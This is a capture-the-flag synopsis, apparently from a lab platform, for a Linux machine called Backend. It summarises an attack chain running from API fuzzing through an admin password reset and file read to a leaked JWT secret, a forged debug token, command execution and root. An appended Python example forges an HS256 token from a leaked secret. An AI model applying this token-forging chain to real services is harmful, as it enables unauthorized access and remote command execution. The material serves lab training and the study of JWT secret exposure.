Machine Synopsis
Backend is a medium-difficulty Linux machine that exposes a backend API with no frontend. Fuzzing the API with HTTP `POST` requests discovers additional endpoints that allow user registration and authentication. Referring to the `FastAPI` documentation then identifies an endpoint that allows updating the admin user's password, and gaining administrative access grants the ability to read files from the server. Reading the application's source code reveals the secret used to sign the JWT, which allows a token to be forged with arbitrary claims. Adding the `debug` parameter to the forged token grants access to an endpoint that permits command execution on the server. From the resulting shell as a low-privileged user, a log file containing the root user's password can be found, allowing escalation to root.
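The token-forging step in the chain above, as an added example that is not part of this writeup or of the machine's own code: given a leaked HS256 signing secret, the attacker decodes the existing token's claims without verifying it, adds a `debug` claim, and re-signs. The secret value, the claim names and the sample token below are constructed for illustration; `verify_hs256` plays the server's role so the forged token can be checked against both the correct and a wrong secret.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional


def _b64url(data: bytes) -> str:
    # JWT compact serialisation uses unpadded base64url (RFC 7515, section 2).
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(segment: str) -> bytes:
    # Restore the padding that was stripped on encoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(claims: dict, secret: str) -> str:
    """Build header.payload.signature with HMAC-SHA256 over the first two parts."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        _b64url(json.dumps(part, separators=(",", ":"), sort_keys=True).encode())
        for part in (header, claims)
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(sig)}"


def decode_unverified(token: str) -> dict:
    """Attacker's view: read the claims without checking the signature."""
    _, payload_b64, _ = token.split(".")
    return json.loads(_b64url_decode(payload_b64))


def verify_hs256(token: str, secret: str) -> Optional[dict]:
    """Server's view: return the claims only if the HS256 signature matches."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(
        secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256
    ).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return None
    return json.loads(_b64url_decode(payload_b64))


def forge_debug_token(original_token: str, leaked_secret: str) -> str:
    """Copy the low-privilege token's claims, add debug=True, re-sign with the leaked secret."""
    claims = decode_unverified(original_token)
    claims["debug"] = True  # hypothetical claim name; the page only calls it the debug parameter
    return sign_hs256(claims, leaked_secret)


# Constructed sample data, not taken from the machine: a hypothetical secret and user token.
LEAKED_SECRET = "hypothetical-secret-read-from-config"
USER_TOKEN = sign_hs256({"sub": "1", "is_superuser": False}, LEAKED_SECRET)
FORGED_TOKEN = forge_debug_token(USER_TOKEN, LEAKED_SECRET)

if __name__ == "__main__":
    print("forged:", FORGED_TOKEN)
    print("accepted by server:", verify_hs256(FORGED_TOKEN, LEAKED_SECRET))
    print("accepted with wrong secret:", verify_hs256(FORGED_TOKEN, "some-other-secret"))
```

The forged token is only useful because the server's signing secret was recoverable from files the admin account could read; a token signed with any other key is rejected by `verify_hs256`, which is the behaviour the check against the wrong secret shows.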
Machine Matrix